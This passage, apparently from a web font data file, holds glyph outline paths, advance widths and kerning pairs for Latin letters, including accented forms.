00c2":32,"\u00c3":32,"\u00c4":32,"\u0100":32,"\u0102":32,"\u00c5":32,"\u01fa":32,"\u0104":32,"\u00c6":32,"\u01fc":32,"o":21,"\u00f2":21,"\u00f3":21,"\u00f4":21,"\u00f5":21,"\u00f6":21,"\u014d":21,"\u014f":21,"\u0151":21,"\u00f8":21,"\u01ff":21,"\u0153":21,"a":20,"\u00e0":20,"\u00e1":20,"\u00e2":20,"\u00e3":20,"\u00e4":20,"\u0101":20,"\u0103":20,"\u00e5":20,"\u01fb":20,"\u0105":20,"\u00e6":20,"\u01fd":20}},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm114,-247r-89,0r0,-22r89,0r0,22","w":138},{"d":"245,0r-104,0r0,-29r20,0r0,-67r-63,0v5,26,-17,73,24,67r0,29r-104,0r0,-29r21,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,63r63,0v-4,-26,16,-70,-25,-63r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29","w":258},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0","w":182},{"d":"105,0r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,202v0,11,9,10,19,10r0,25xm89,-272v-23,0,-47,3,-68,14r-8,-7v19,-22,38,-37,58,-37v16,0,20,13,18,30","w":115},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r74,-189v-24,-15,-8,-56,21,-53v28,-3,43,38,21,54r67,174v5,12,12,15,27,14r0,29xm132,-241v0,-10,-5,-16,-14,-16v-9,0,-14,6,-14,16v0,10,5,16,14,16v9,0,14,-6,14,-16xm128,-93r-21,-62r-23,62r44,0xm152,-291v-23,0,-47,3,-68,14r-8,-7v19,-22,38,-37,58,-37v17,0,19,13,18,30","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"99,-67r-85,0r0,-38r85,0r0,38","w":113},{"d":"88,-151v40,-35,101,-22,101,36r0,80v0,11,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16","w":217},{"d":"215,-111v0,93,-60,130,-138,109r-11,24r-30,0r18,-37v-24,-18,-38,-50,-38,-96v0,-92,60,-130,137,-109r14,-31r30,0r-21,43v24,18,39,51,39,97xm133,-180v-35,-19,-55,10,-56,69v0,15,1,29,4,39xm116,-36v34,10,46,-76,33,-116r-52,110v5,5,12,6,19,6","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"289,0r-88,0r0,-29r20,0r0,-84r-55,113r-24,0r-62,-113r0,69v-2,14,10,16,25,15r0,29r-87,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r60,0r83,155r73,-155r54,0r0,29r-20,0r0,149v-2,13,10,16,25,15r0,29","w":302},{"d":"90,-217v0,18,-14,28,-31,28v-17,0,-31,-10,-31,-28v0,-18,14,-29,31,-29v17,0,31,11,31,29xm108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25","w":118},{"d":"57,-98v0,13,-11,23,-24,23v-13,0,-22,-10,-22,-23v0,-13,9,-22,22,-22v13,0,24,9,24,22","w":67},{"d":"69,-82v0,32,8,52,37,53v15,0,32,-7,40,-13r14,24v-12,11,-38,23,-64,23v-54,0,-84,-34,-84,-87v0,-75,71,-109,122,-74r2,-9r20,0r0,67v-18,2,-29,-1,-29,-20v0,-14,-12,-20,-24,-20v-28,2,-34,25,-34,56xm126,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,38,-37,58,-37v17,0,18,14,17,31","w":174},{"d":"150,-45v0,46,-75,66,-109,35r-3,10r-20,0r0,-66v15,0,29,-3,28,16v-1,25,48,35,53,11v3,-14,-30,-22,-43,-27v-23,-10,-40,-24,-40,-52v0,-48,73,-67,103,-38r2,-9r20,0r0,65v-17,1,-28,0,-27,-18v1,-26,-45,-29,-47,-7v-1,15,33,23,46,30v22,11,37,24,37,50xm127,-184v-26,4,-35,-9,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":160},{"d":"62,-105v0,89,105,98,176,74r5,17v-18,8,-59,18,-100,18v-68,0,-127,-38,-127,-102v0,-75,71,-128,154,-128v68,0,126,38,126,107v0,37,-27,73,-81,73v-15,0,-31,-5,-37,-20v-21,41,-89,21,-89,-31v0,-69,77,-99,133,-64r-8,72v0,9,2,16,12,16v21,0,25,-41,25,-55v0,-52,-39,-74,-87,-74v-57,0,-102,39,-102,97xm173,-153v-31,-2,-37,36,-37,58v-5,22,28,28,30,7","w":311},{"d":"189,-63r-15,15r-24,-24v-26,18,-56,20,-84,0r-24,24r-15,-15v8,-8,17,-15,25,-23v-19,-24,-18,-59,0,-83r-25,-24r15,-15r24,24v30,-19,56,-19,84,0r24,-24r15,15r-24,24v19,26,18,58,0,83xm158,-128v0,-29,-25,-49,-50,-49v-28,0,-50,23,-50,49v0,27,23,50,50,50v27,0,50,-23,50,-50","w":220},{"d":"124,43v0,26,-39,44,-64,28r5,-19v10,7,32,8,32,-8v0,-11,-16,-16,-23,-8r-15,-6r8,-27v-10,-3,-18,-7,-26,-13r-3,10r-20,0r0,-66v15,0,29,-3,28,16v-1,25,48,35,53,11v3,-14,-30,-22,-43,-27v-23,-10,-40,-24,-40,-52v0,-48,73,-67,103,-38r2,-9r20,0r0,65v-17,1,-28,0,-27,-18v1,-26,-45,-29,-47,-7v-1,15,33,23,46,30v22,11,37,24,37,50v0,29,-27,50,-64,50r-3,9v22,-5,41,6,41,29","w":160},{"d":"201,-140r-29,0r0,185v-1,14,16,7,27,9r0,26v-36,-2,-81,10,-81,-31r0,-54v-53,26,-107,-2,-106,-76v1,-83,59,-109,104,-73v0,-9,3,-13,14,-13v20,0,33,2,66,2xm116,-35r0,-88v-22,-22,-47,-6,-47,42v0,44,19,62,47,46","w":201,"k":{"v":-6}},{"d":"88,-217v0,18,-14,28,-31,28v-17,0,-31,-10,-31,-28v0,-18,14,-29,31,-29v17,0,31,11,31,29xm91,3v7,65,-52,77,-105,60r0,-32v20,7,49,12,49,-19r0,-152r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,160","w":119},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm141,-188r-7,8v-21,-11,-45,-14,-68,-14v-1,-17,1,-31,18,-31v20,0,38,15,57,37","w":190},{"d":"168,-156v-18,2,-26,-3,-27,-18v-1,-28,-58,-33,-58,-2v0,32,88,26,88,98v0,19,-10,36,-27,45v18,12,27,25,27,47v1,56,-75,70,-112,40r-3,11r-19,0r0,-66v17,-2,27,1,27,18v0,31,58,31,58,2v0,-32,-87,-25,-87,-97v0,-19,10,-36,27,-45v-18,-12,-27,-26,-27,-48v-1,-56,75,-70,112,-40r2,-11r19,0r0,66xm108,-53v26,-12,13,-47,-12,-52v-24,13,-13,48,12,52"},{"d":"89,43v0,26,-39,44,-63,28r4,-19v10,7,32,8,32,-8v0,-11,-16,-16,-23,-8r-15,-6r11,-35r19,0r-6,19v22,-5,41,6,41,29","w":118},{"d":"217,69v-28,11,-66,-1,-65,-34v0,-14,7,-29,22,-35r-42,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29v-29,-3,-49,6,-50,32v-1,19,21,22,34,16r0,21xm128,-93r-21,-62r-23,62r44,0","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"228,-193v-20,0,-26,0,-36,18r-46,90v4,23,-13,61,22,56r0,29r-102,0r0,-29r21,0r0,-55r-46,-92v-7,-16,-15,-18,-34,-17r0,-29r103,0r0,29r-15,0r31,63r32,-63r-14,0r0,-29r84,0r0,29xm161,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,38,-37,58,-37v16,0,18,13,17,30","w":235,"k":{"Q":4,"q":19,"C":5,"\u0106":5,"\u00c7":5,"\u0108":5,"\u010c":5,"\u010a":5,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4,"e":22,"\u00e8":22,"\u00e9":22,"\u00ea":22,"\u011b":22,"\u00eb":22,"\u0113":22,"\u0115":22,"\u0117":22,"\u0119":22,"A":19,"\u00c0":19,"\u00c1":19,"\u00c2":19,"\u00c3":19,"\u00c4":19,"\u0100":19,"\u0102":19,"\u00c5":19,"\u01fa":19,"\u0104":19,"\u00c6":19,"\u01fc":19,"o":22,"\u00f2":22,"\u00f3":22,"\u00f4":22,"\u00f5":22,"\u00f6":22,"\u014d":22,"\u014f":22,"\u0151":22,"\u00f8":22,"\u01ff":22,"\u0153":22,"a":22,"\u00e0":22,"\u00e1":22,"\u00e2":22,"\u00e3":22,"\u00e4":22,"\u0101":22,"\u0103":22,"\u00e5":22,"\u01fb":22,"\u0105":22,"\u00e6":22,"\u01fd":22}},{"d":"240,0r-106,0r0,-29r15,0r-28,-44r-25,44r15,0r0,29r-100,0r0,-29v19,1,32,-1,40,-14r41,-66r-49,-72v-5,-10,-15,-13,-32,-12r0,-29r97,0r0,29r-13,0r28,43r24,-43r-12,0r0,-29r92,0r0,29v-19,0,-31,-1,-39,13r-36,64r50,73v9,13,19,15,38,14r0,29","w":245},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25","w":118},{"d":"251,-111v0,69,-52,115,-119,115v-67,0,-118,-46,-118,-115v0,-69,51,-115,118,-115v67,0,119,46,119,115xm217,-111v0,-54,-34,-91,-85,-91v-51,0,-85,37,-85,91v0,54,34,92,85,92v51,0,85,-38,85,-92xm80,-166v42,2,97,-10,97,33v0,13,-5,23,-19,29v10,11,12,34,33,34r0,15r-36,0r-24,-44r-10,0v2,13,-7,33,13,29r0,15r-52,0r0,-15r10,0r0,-74v1,-7,-5,-9,-12,-8r0,-14xm146,-133v0,-16,-9,-20,-25,-19r0,38v17,2,25,-5,25,-19","w":264},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm140,-188r-8,8v-21,-11,-44,-14,-67,-14v-1,-17,1,-31,18,-31v20,0,38,15,57,37","w":216},{"d":"17,-111v0,-83,74,-145,141,-99r2,-12r26,0r0,82v-12,0,-28,3,-30,-9v-3,-20,-6,-39,-33,-40v-26,0,-45,21,-45,75v0,85,56,98,95,59r20,23v-15,18,-44,36,-78,36v-60,0,-98,-42,-98,-115xm161,-281v-15,15,-31,58,-63,36r-30,-36v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":209},{"d":"210,-144v-12,-1,-28,4,-29,-8v-4,-13,0,-41,-16,-41r-24,0r0,149v-2,14,10,16,25,15r0,29r-106,0r0,-29r22,0r0,-164v-15,2,-34,-7,-36,10v-5,13,3,38,-14,39r-19,0r1,-78r194,0","w":222,"k":{"q":4,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u011b":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"A":14,"\u00c0":14,"\u00c1":14,"\u00c2":14,"\u00c3":14,"\u00c4":14,"\u0100":14,"\u0102":14,"\u00c5":14,"\u01fa":14,"\u0104":14,"\u00c6":14,"\u01fc":14,"o":4,"\u00f2":4,"\u00f3":4,"\u00f4":4,"\u00f5":4,"\u00f6":4,"\u014d":4,"\u014f":4,"\u0151":4,"\u00f8":4,"\u01ff":4,"\u0153":4}},{"d":"310,0r-179,0r0,-29r20,0r0,-37r-69,0v-3,10,-26,33,-6,37r13,0r0,29r-89,0r0,-29r22,0r113,-193r169,0r3,83v-13,0,-27,1,-28,-11v-6,-17,0,-43,-25,-43r-44,0r0,68r25,0v3,-15,4,-30,27,-25r0,77v-11,-1,-20,4,-23,-9r-4,-16r-25,0v4,24,-13,69,17,69r47,0v5,-16,9,-41,9,-58v14,0,27,-3,27,13r0,74xm151,-93r0,-95r-53,95r53,0xm256,-254v-23,0,-47,3,-68,14r-8,-7v19,-22,38,-37,58,-37v16,0,20,13,18,30","w":331,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"272,-37r-25,0v-1,13,1,22,16,19r0,18r-67,0r0,-18r15,0r0,-19r-57,0r0,-16r63,-87r30,0r0,83r25,0r0,20xm204,-222r-102,222r-32,0r103,-222r31,0xm91,-82r-67,0r0,-18r15,0r0,-94r-20,0r-3,-18v28,-1,33,-13,59,-10r0,113v-1,9,7,10,16,9r0,18xm211,-57r0,-43r-32,43r32,0","w":288},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm152,-254v-23,0,-47,3,-68,14r-8,-7v19,-22,38,-37,58,-37v16,0,20,13,18,30","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"113,-185v8,29,-60,62,-62,78r40,0v4,-13,4,-30,25,-25r-5,48r-95,0v-13,-47,58,-70,60,-100v2,-22,-35,-16,-50,-10r-6,-25v37,-14,97,-9,93,34","w":132},{"d":"210,0v-27,-2,-63,8,-68,-17v-13,11,-32,22,-57,22v-2,36,11,75,-33,75r-44,0r0,-26v10,0,23,2,23,-9r0,-185r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,105v-1,28,34,22,46,8r0,-96r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,120v-1,13,10,13,22,12r0,25","w":217},{"d":"197,0r-179,0r0,-29r20,0r0,-58r-31,11r0,-32r31,-11v-6,-28,19,-80,-25,-74r0,-29r104,0r0,29r-20,0r0,52r30,-11r0,31r-30,12r0,65v0,28,42,10,64,15v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74","w":211},{"d":"228,-193v-20,0,-26,0,-36,18r-46,90v4,23,-13,61,22,56r0,29r-102,0r0,-29r21,0r0,-55r-46,-92v-7,-16,-15,-18,-34,-17r0,-29r103,0r0,29r-15,0r31,63r32,-63r-14,0r0,-29r84,0r0,29","w":235,"k":{"Q":4,"q":19,"C":5,"\u0106":5,"\u00c7":5,"\u0108":5,"\u010c":5,"\u010a":5,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4,"e":22,"\u00e8":22,"\u00e9":22,"\u00ea":22,"\u011b":22,"\u00eb":22,"\u0113":22,"\u0115":22,"\u0117":22,"\u0119":22,"A":19,"\u00c0":19,"\u00c1":19,"\u00c2":19,"\u00c3":19,"\u00c4":19,"\u0100":19,"\u0102":19,"\u00c5":19,"\u01fa":19,"\u0104":19,"\u00c6":19,"\u01fc":19,"o":22,"\u00f2":22,"\u00f3":22,"\u00f4":22,"\u00f5":22,"\u00f6":22,"\u014d":22,"\u014f":22,"\u0151":22,"\u00f8":22,"\u01ff":22,"\u0153":22,"a":22,"\u00e0":22,"\u00e1":22,"\u00e2":22,"\u00e3":22,"\u00e4":22,"\u0101":22,"\u0103":22,"\u00e5":22,"\u01fb":22,"\u0105":22,"\u00e6":22,"\u01fd":22}},{"d":"191,-140v-15,0,-23,-2,-28,13r-47,127r-45,0r-56,-140r-18,0r0,-25r93,0r0,25v-13,-1,-20,3,-15,15r25,70r29,-85r-17,0r0,-25r74,0","w":184,"k":{"y":-7,"x":-4,"t":-6,"f":-4}},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm161,-256v0,10,-8,18,-18,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,18,8,18,18xm106,-256v0,10,-9,18,-19,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,19,8,19,18","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"126,-171v0,37,-24,55,-59,55v-35,0,-58,-18,-58,-55v0,-37,23,-55,58,-55v35,0,59,18,59,55xm93,-171v0,-19,-9,-32,-26,-32v-17,0,-25,13,-25,32v0,19,8,32,25,32v17,0,26,-13,26,-32","w":135},{"d":"216,-243r-8,32v-33,-9,-48,-5,-58,46r-8,43r41,0r-6,31r-41,0r-16,87v-17,85,-69,95,-130,73r8,-35v32,19,53,3,61,-41r16,-84r-34,0r0,-31r40,0v12,-66,21,-128,94,-128v15,0,31,3,41,7"},{"d":"77,-28v0,22,-11,32,-29,32v-62,0,-6,-110,-12,-163r24,0v0,30,17,112,17,131xm71,-204v0,13,-10,23,-23,23v-13,0,-22,-10,-22,-23v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":96},{"d":"333,-193v-18,0,-27,-1,-32,16r-53,177r-42,0r-35,-114r-39,114r-43,0r-51,-176v-4,-17,-13,-17,-31,-17r0,-29r103,0r0,29r-18,0r28,115r48,-144r24,0r45,144r30,-115r-17,0r0,-29r83,0r0,29","w":340,"k":{"Q":4,"U":1,"y":11,"s":23,"u":11,"\u00f9":11,"\u00fa":11,"\u00fb":11,"\u0169":11,"\u00fc":11,"\u016b":11,"\u016d":11,"\u016f":11,"\u0171":11,"\u0173":11,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4,"e":19,"\u00e8":19,"\u00e9":19,"\u00ea":19,"\u011b":19,"\u00eb":19,"\u0113":19,"\u0115":19,"\u0117":19,"\u0119":19,"A":32,"\u00c0":32,"\u00c1":32,"\u00c2":32,"\u00c3":32,"\u00c4":32,"\u0100":32,"\u0102":32,"\u00c5":32,"\u01fa":32,"\u0104":32,"\u00c6":32,"\u01fc":32,"o":21,"\u00f2":21,"\u00f3":21,"\u00f4":21,"\u00f5":21,"\u00f6":21,"\u014d":21,"\u014f":21,"\u0151":21,"\u00f8":21,"\u01ff":21,"\u0153":21,"a":20,"\u00e0":20,"\u00e1":20,"\u00e2":20,"\u00e3":20,"\u00e4":20,"\u0101":20,"\u0103":20,"\u00e5":20,"\u01fb":20,"\u0105":20,"\u00e6":20,"\u01fd":20}},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm143,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,38,-37,58,-37v16,0,18,13,17,30","w":219},{"d":"80,-140v3,46,-18,130,45,106r0,31v-9,3,-25,7,-43,7v-70,0,-56,-77,-57,-144r-21,0r0,-25r21,0v0,0,-3,-35,15,-37r40,-6r0,43r34,0r5,25r-39,0xm130,-238v0,17,-8,33,-26,59r-12,-6v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,8,-20,20,-20v12,0,22,8,22,22","w":132},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r74,-189v-24,-15,-8,-56,21,-53v28,-3,43,38,21,54r67,174v5,12,12,15,27,14r0,29xm132,-241v0,-10,-5,-16,-14,-16v-9,0,-14,6,-14,16v0,10,5,16,14,16v9,0,14,-6,14,-16xm128,-93r-21,-62r-23,62r44,0","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"80,-222v106,-6,148,30,148,112v0,69,-36,110,-116,110r-94,0r0,-29r20,0r0,-69r-28,0r0,-28r28,0v-5,-27,17,-73,-25,-67r0,-29r67,0xm167,-111v0,-54,-14,-86,-70,-82r0,67r26,0r0,28r-26,0v5,27,-16,69,24,69v29,0,46,-20,46,-82","w":244},{"w":86},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm134,-188r-8,8v-21,-11,-44,-14,-67,-14v-1,-17,1,-31,18,-31v20,0,38,15,57,37","w":185},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm170,-281v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-19,0v4,-43,44,-38,72,-26v8,0,14,-5,16,-10r18,0","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"188,-64v0,36,-25,68,-85,68v-44,0,-86,-19,-86,-63v0,-24,17,-46,39,-55v-50,-29,-29,-112,46,-112v84,0,94,74,39,101v24,12,47,29,47,61xm107,-141v22,-13,29,-54,-4,-54v-30,0,-28,39,-5,48v3,2,5,4,9,6xm103,-28v31,0,37,-45,12,-56v-7,-5,-15,-8,-23,-12v-27,14,-26,68,11,68"},{"d":"159,-182v-44,-28,-81,17,-81,71v0,70,26,88,70,73v-2,-20,9,-47,-21,-41r0,-29r97,0r0,29r-17,0r0,79r-41,0r-5,-10v-65,33,-144,10,-144,-99v0,-91,94,-149,158,-97r3,-16r25,0r0,81v-19,2,-32,0,-32,-20v-2,-9,-5,-17,-12,-21xm144,-262v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":240,"k":{"v